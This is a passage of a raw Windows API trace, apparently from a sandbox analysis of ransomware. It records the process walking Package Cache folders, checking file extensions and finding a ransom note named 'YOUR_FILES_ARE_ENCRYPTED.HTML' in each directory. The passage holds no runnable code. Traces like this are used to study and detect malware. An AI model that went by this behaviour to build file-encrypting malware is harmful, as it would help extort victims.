(pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0170.123] lstrlenW (lpString=".msu") returned 4 [0170.123] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0170.123] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.123] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.123] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.124] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.124] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.124] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.124] GetProcessHeap () returned 0x270000 [0170.125] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0170.125] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.125] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0170.125] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.125] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.125] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.125] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0170.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\patch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.125] GetProcessHeap () returned 0x270000 [0170.126] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.126] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.126] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.126] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.126] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2b01a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.126] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.126] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.127] GetProcessHeap () returned 0x270000 [0170.127] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.127] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2d6300, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.127] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0170.127] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.127] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc2d6300, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.127] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.128] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0170.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.128] GetProcessHeap () returned 0x270000 [0170.129] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.135] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd013d60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcd013d60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd013d60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.135] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0170.135] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.135] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", cAlternateFileName="{0FA68~1.285")) returned 1 [0170.135] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned 87 [0170.135] GetProcessHeap () returned 0x270000 [0170.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.137] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" [0170.137] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*" [0170.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.137] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc68e560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc68e560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.138] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.138] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned 96 [0170.138] GetProcessHeap () returned 0x270000 [0170.138] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.140] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" [0170.140] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*" [0170.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.140] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.141] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.141] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned 120 [0170.141] GetProcessHeap () returned 0x270000 [0170.141] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.142] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" [0170.142] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*" [0170.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.143] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.143] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b027600, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x1b027600, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0xcc6422a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4f83ae, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343", cAlternateFileName="CAB1CA~1.4A7")) returned 1 [0170.143] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343") returned 194 [0170.143] lstrcmpW (lpString1="cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.143] PathFindExtensionW (pszPath="cab1.cab.4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343") returned=".4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343" [0170.143] lstrlenW (lpString=".4A70091801A5FAE53A764E3FFF873AF7E02A1AE8FD8D040ED2D63534408EA343") returned 65 [0170.143] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.143] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 149 [0170.143] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.143] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.143] lstrlenW (lpString=".msi") returned 4 [0170.143] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.143] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc668400, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.143] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 150 [0170.143] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.144] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc668400, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc668400, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc668400, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.144] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.144] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 150 [0170.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.144] GetProcessHeap () returned 0x270000 [0170.145] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.145] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, 